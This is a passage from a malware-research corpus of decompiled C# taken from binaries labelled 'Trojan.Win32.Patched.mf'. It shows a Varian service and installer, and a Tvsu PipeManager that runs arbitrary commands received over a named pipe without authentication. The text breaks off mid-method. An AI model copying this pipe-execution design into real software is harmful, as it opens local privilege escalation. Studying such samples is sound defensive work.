<Compile Include="Abstract\BaseServicesSetup.cs" />
<Compile Include="Concrete\ConcreteServicesSetup.cs" />
<Compile Include="Concrete\Maintenance\Maintenance.cs" />
<Compile Include="Concrete\PlatformServiceController\PlatformServiceController.cs" />
<Compile Include="Concrete\Inventory\InventoryUpdate.cs" />
<Compile Include="Concrete\Inventory\InventoryReplicator.cs" />
<Compile Include="VMS\OSP\Properties\Settings.cs" />
<Compile Include="VMS\OSP\Inventory\Inventory.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="VMSOSPService.resx" />
<EmbeddedResource Include="VMSOSPServiceInstaller.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/Trojan.Win32.Patched.mf.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "VMS.OSP.Service", "Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.csproj", "{3933AEB5-C476-4FA9-875F-0DE64DF43C30}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3933AEB5-C476-4FA9-875F-0DE64DF43C30}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{3933AEB5-C476-4FA9-875F-0DE64DF43C30}.Debug|Any CPU.Build.0 = Debug|Any CPU
{3933AEB5-C476-4FA9-875F-0DE64DF43C30}.Release|Any CPU.ActiveCfg = Release|Any CPU
{3933AEB5-C476-4FA9-875F-0DE64DF43C30}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/VMS/OSP/Inventory/Inventory.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSP.Inventory.Inventory
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Web.Services;
using System.Web.Services.Description;
using System.Web.Services.Protocols;
namespace VMS.OSP.Inventory
{
[WebServiceBinding(Name = "InventorySoap", Namespace = "http://varian.com/vms.osp.webservices/2006/03/inventory.asmx")]
[DebuggerStepThrough]
[DesignerCategory("code")]
public class Inventory : SoapHttpClientProtocol
{
public Inventory()
{
string appSetting = ConfigurationManager.AppSettings["VMS.OSP.Service.Inventory.Inventory"];
if (appSetting != null)
this.Url = appSetting + "";
else
this.Url = "http://localhost/OSPServices/Inventory.asmx";
}
[SoapDocumentMethod("http://varian.com/vms.osp.webservices/2006/03/inventory.asmx/MergeLocalInventory", ParameterStyle = SoapParameterStyle.Wrapped, RequestNamespace = "http://varian.com/vms.osp.webservices/2006/03/inventory.asmx", ResponseNamespace = "http://varian.com/vms.osp.webservices/2006/03/inventory.asmx", Use = SoapBindingUse.Literal)]
public bool MergeLocalInventory(InventoryDataSet clientInventoryDS) => (bool) this.Invoke(nameof (MergeLocalInventory), new object[1]
{
(object) clientInventoryDS
})[0];
public IAsyncResult BeginMergeLocalInventory(
InventoryDataSet clientInventoryDS,
AsyncCallback callback,
object asyncState)
{
return this.BeginInvoke("MergeLocalInventory", new object[1]
{
(object) clientInventoryDS
}, callback, asyncState);
}
public bool EndMergeLocalInventory(IAsyncResult asyncResult) => (bool) this.EndInvoke(asyncResult)[0];
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/VMS/OSP/Properties/Settings.cs
+28
View File
@@ -0,0 +1,28 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSP.Properties.Settings
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace VMS.OSP.Properties
{
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
[SpecialSetting(SpecialSetting.WebServiceUrl)]
[DefaultSettingValue("http://localhost:4254/OSPServices/Inventory.asmx")]
[ApplicationScopedSetting]
[DebuggerNonUserCode]
public string VMS_OSP_Service_Inventory_Inventory => (string) this[nameof (VMS_OSP_Service_Inventory_Inventory)];
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/VMSOSPService.cs
+70
View File
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.VMSOSPService
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.ComponentModel;
using System.ServiceProcess;
using VMS.OSService.Concrete;
namespace VMS.OSService
{
public class VMSOSPService : ServiceBase
{
private Container components;
private ConcreteServicesSetup _services;
public VMSOSPService()
{
this.InitializeComponent();
this.ServiceName = "Varian OSP Service";
this.CanPauseAndContinue = false;
this.CanShutdown = false;
this.CanStop = true;
this.CanHandlePowerEvent = false;
this.AutoLog = false;
this._services = new ConcreteServicesSetup(this.EventLog);
}
private void InitializeComponent()
{
this.components = new Container();
this.ServiceName = "Varian OSP Service";
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
protected override void OnStart(string[] args)
{
this._services.StartAll(args);
try
{
this.EventLog.WriteEntry(string.Format("{0} started.", (object) "Varian OSP Service"));
}
catch (Exception ex)
{
}
}
protected override void OnStop()
{
this._services.StopAll();
try
{
this.EventLog.WriteEntry(string.Format("{0} stopped.", (object) "Varian OSP Service"));
}
catch (Exception ex)
{
}
}
protected override void OnCustomCommand(int command) => this._services.CustomCommandToAll(command);
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/VMSOSPService.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/VMSOSPServiceInstaller.cs
+77
View File
@@ -0,0 +1,77 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.VMSOSPServiceInstaller
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Configuration.Install;
using System.ServiceProcess;
namespace VMS.OSService
{
[RunInstaller(true)]
public class VMSOSPServiceInstaller : Installer
{
private ServiceProcessInstaller serviceProcessInstaller1;
private ServiceInstaller serviceInstaller1;
private Container components;
public VMSOSPServiceInstaller()
{
this.InitializeComponent();
this.serviceInstaller1.ServiceName = "Varian OSP Service";
this.serviceInstaller1.DisplayName = "Varian OSP Service";
this.serviceInstaller1.StartType = ServiceStartMode.Automatic;
this.AfterInstall += new InstallEventHandler(this.VMSServiceInstaller_AfterInstall);
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.serviceProcessInstaller1 = new ServiceProcessInstaller();
this.serviceInstaller1 = new ServiceInstaller();
this.serviceProcessInstaller1.Account = ServiceAccount.LocalSystem;
this.serviceProcessInstaller1.Password = (string) null;
this.serviceProcessInstaller1.Username = (string) null;
this.serviceInstaller1.DisplayName = "Varian OSP Service";
this.serviceInstaller1.ServiceName = "Varian OSP Service";
this.serviceInstaller1.StartType = ServiceStartMode.Automatic;
this.Installers.AddRange(new Installer[2]
{
(Installer) this.serviceProcessInstaller1,
(Installer) this.serviceInstaller1
});
}
private void VMSServiceInstaller_AfterInstall(object sender, InstallEventArgs e)
{
try
{
string name = "SYSTEM\\CurrentControlSet\\Services\\Varian OSP Service";
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(name, true))
registryKey?.SetValue("Description", (object) "Controls software inventory and OSP maintenance.");
}
catch (Exception ex)
{
}
try
{
string name = "SYSTEM\\CurrentControlSet\\Control\\";
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(name, true))
registryKey?.SetValue("ServicesPipeTimeout", (object) 200000, RegistryValueKind.DWord);
}
catch (Exception ex)
{
}
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/VMSOSPServiceInstaller.resx
+148
View File
@@ -0,0 +1,148 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="serviceProcessInstaller1.Location" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFFTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABRTeXN0ZW0uRHJhd2luZy5Qb2ludAIAAAABeAF5AAAICAIAAAARAAAAEQAAAAs=</value>
</data>
<assembly alias="mscorlib" name="mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
<data name="$this.TrayLargeIcon" type="System.Boolean, mscorlib">
<value>False</value>
</data>
<data name="$this.Name" xml:space="preserve">
<value>VMSOSPServiceInstaller</value>
</data>
<data name="$this.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="serviceInstaller1.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="serviceInstaller1.Modifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="serviceInstaller1.Location" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFFTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABRTeXN0ZW0uRHJhd2luZy5Qb2ludAIAAAABeAF5AAAICAIAAAC7AAAAEQAAAAs=</value>
</data>
<data name="serviceProcessInstaller1.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="serviceProcessInstaller1.Modifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
</root>
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/VMSOSPStartup.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.VMSOSPStartup
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System.ServiceProcess;
namespace VMS.OSService
{
public class VMSOSPStartup
{
private static void Main() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new VMSOSPService()
});
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1/PipeManager.cs
+357
View File
@@ -0,0 +1,357 @@
// Decompiled with JetBrains decompiler
// Type: Tvsu.Service.Server.PipeManager
// Assembly: SUService, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C794206D-ECC0-4CFA-AB4E-5C06FB2FD4CC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.Diagnostics;
using System.Globalization;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;
using Tvsu.Service.Common.InterProcessComm;
using Tvsu.Service.Common.NamedPipes;
using Tvsu.Service.Common.Util;
namespace Tvsu.Service.Server
{
public sealed class PipeManager : IChannelManager
{
private const string UNINSTALL = "/u";
private const string EXECUTE = "/execute";
private const string DIR = "/directory";
private const string ARGUMENTS = "/arguments";
private const string INSTALL_TYPE = "/type";
private const string PIPE_SERVER_NAME = "SUPipeServer";
private const int MAX_READ_BYTES = 5000;
private const int PIPE_MAX_STUFFED_TIME = 5000;
private static string commandLine = (string) null;
private static string argumentsValue = (string) null;
private static string directoryPath = (string) null;
private static string installType = (string) null;
[MarshalAs(UnmanagedType.LPStr)]
private string hardwareId;
[MarshalAs(UnmanagedType.LPStr)]
private string infFilePath;
public Hashtable Pipes;
private uint NumberPipes = 5;
private uint OutBuffer = 512;
private uint InBuffer = 512;
private bool _listen = true;
private int numChannels = 0;
private Hashtable _pipes = new Hashtable();
private Thread MainThread;
private string PipeName = "SUPipeServer";
private ManualResetEvent Mre;
public object SyncRoot = new object();
[DllImport("tools.dll")]
public static extern bool updateDriverForPlugAndPlayDevices(
string hardwareId,
string fullInfPath);
[DllImport("tools.dll")]
public static extern string GetError();
public bool Listen
{
get => this._listen;
set => this._listen = value;
}
public void Initialize()
{
this.Pipes = Hashtable.Synchronized(this._pipes);
this.Mre = new ManualResetEvent(false);
this.MainThread = new Thread(new ThreadStart(this.Start));
this.MainThread.IsBackground = false;
this.MainThread.Name = "Main Pipe Thread";
this.MainThread.Start();
Thread.Sleep(1000);
}
public string HandleRequest(string request)
{
string str = request;
try
{
ServiceLogger.Instance.Info(request);
PipeManager.commandLine = "";
PipeManager.argumentsValue = "";
PipeManager.directoryPath = "";
PipeManager.installType = "";
PipeManager.BuildCommandLine(str.Split(' '));
ServiceLogger.Instance.Info(PipeManager.directoryPath + Environment.NewLine + PipeManager.commandLine + Environment.NewLine + PipeManager.argumentsValue + Environment.NewLine + PipeManager.installType);
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error handling request", ex);
}
return this.ExecuteCommand(PipeManager.directoryPath, PipeManager.commandLine, PipeManager.argumentsValue, PipeManager.installType).ToString();
}
private int ExecuteCommand(string dir, string cmd, string args, string _installType)
{
int num = int.MinValue;
string path = "";
try
{
ServiceLogger.Instance.Info("Directory 1: " + dir);
if (PipeManager.DirectoryExists(dir))
path = dir;
ServiceLogger.Instance.Info("If directory 1 exists: " + path);
switch (_installType)
{
case "":
case null:
_installType = "COMMAND";
break;
}
if (_installType == PipeManager.InstallType.INF.ToString())
{
this.infFilePath = cmd;
Directory.SetCurrentDirectory(path);
this.hardwareId = args;
return PipeManager.updateDriverForPlugAndPlayDevices(this.hardwareId, this.infFilePath) ? 1 : 0;
}
Process process = new Process();
ProcessStartInfo processStartInfo = new ProcessStartInfo();
if (File.Exists(path + "\\" + cmd))
processStartInfo.WorkingDirectory = path;
else if (File.Exists(path + "\\" + cmd.Substring(cmd.LastIndexOf("\\") + 1, cmd.Length - 1 - cmd.LastIndexOf("\\"))))
{
processStartInfo.WorkingDirectory = path;
cmd = cmd.Substring(cmd.LastIndexOf("\\") + 1, cmd.Length - 1 - cmd.LastIndexOf("\\"));
}
else if (File.Exists(cmd))
{
path = cmd.Substring(0, cmd.LastIndexOf("\\"));
cmd = cmd.Substring(cmd.LastIndexOf("\\") + 1, cmd.Length - 1 - cmd.LastIndexOf("\\"));
processStartInfo.WorkingDirectory = path;
}
ServiceLogger.Instance.Info("The parameters directory and command stay as follows:" + Environment.NewLine + "command: " + cmd + Environment.NewLine + "directory: " + path);
switch (args)
{
case "":
case null:
processStartInfo.FileName = cmd;
break;
default:
processStartInfo.FileName = cmd;
processStartInfo.Arguments = args;
break;
}
if (string.Compare(cmd, "egather2.exe", true, new CultureInfo("en-US", false)) == 0)
{
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
ServiceLogger.Instance.Info("Type hidden");
}
else
{
processStartInfo.WindowStyle = ProcessWindowStyle.Normal;
ServiceLogger.Instance.Info("Type normal");
}
if (_installType == PipeManager.InstallType.SHELL.ToString())
processStartInfo.UseShellExecute = true;
process.StartInfo = processStartInfo;
process.Start();
while (!process.HasExited)
process.WaitForExit();
num = process.ExitCode;
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error executing command: " + cmd, ex);
}
return num;
}
private int WriteRegistryValue(string dir, string svalue)
{
string root = dir.Substring(0, dir.IndexOf("\\"));
string str = dir.Substring(dir.IndexOf("\\") + 1, dir.LastIndexOf("\\") - dir.IndexOf("\\"));
string name = dir.Substring(dir.LastIndexOf("\\") + 1, dir.Length - dir.LastIndexOf("\\") - 1);
RegistryKey registryKey = PipeManager.GetRegistryKey(root);
if (registryKey == null)
return int.MinValue;
if (registryKey.OpenSubKey(str) != null)
{
if (svalue == null)
svalue = "";
registryKey.OpenSubKey(str, true).SetValue(name, (object) svalue);
}
else
{
ServiceLogger.Instance.Info("Creating sub Key: " + str);
registryKey.CreateSubKey(str);
registryKey.OpenSubKey(str, true).SetValue(name, (object) svalue);
}
registryKey.Close();
return 0;
}
public static RegistryKey GetRegistryKey(string root)
{
RegistryKey registryKey = (RegistryKey) null;
switch (root)
{
case "HKEY_CLASSES_ROOT":
registryKey = Registry.ClassesRoot;
break;
case "HKEY_CURRENT_USER":
registryKey = Registry.CurrentUser;
break;
case "HKEY_LOCAL_MACHINE":
registryKey = Registry.LocalMachine;
break;
case "HKEY_USERS":
registryKey = Registry.Users;
break;
case "HKEY_CURRENT_CONFIG":
